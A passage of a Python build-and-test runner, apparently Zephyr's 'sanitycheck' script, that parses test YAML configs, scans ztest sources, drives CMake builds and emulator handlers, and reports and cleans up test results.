elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb", "nsim", "renode", "qemu"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
else:
ldflags = cflags = aflags = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
f'-DEXTRA_AFLAGS="{aflags}',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-G{self.generator}'
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
self.suite.build_filtered_tests += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.status}")
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_to_do))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout"]:
if instance.status == "error":
self.suite.total_errors += 1
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if self.suite.total_to_do > 0:
completed_perc = int((float(self.suite.total_done) / self.suite.total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if self.suite.build_filtered_tests > 0 else Fore.RESET,
self.suite.build_filtered_tests,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan or self.ubsan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_skipped_cases = 0 # number of skipped test cases
self.total_to_do = 0 # number of test instances to be run
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.build_filtered_tests = 0
self.total_passed = 0
self.total_errors = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
# run integration tests only
self.integration = False
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self):
self.total_tests = len(self.instances)
self.total_cases = 0
self.total_skipped = 0
self.total_skipped_cases = 0
self.total_passed = 0
for instance in self.instances.values():
self.total_cases += len(instance.testcase.cases)
if instance.status == 'skipped':
self.total_skipped += 1
self.total_skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
self.total_passed += 1
for res in instance.results.values():
if res == 'SKIP':
self.total_skipped_cases += 1
self.total_to_do = self.total_tests - self.total_skipped
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
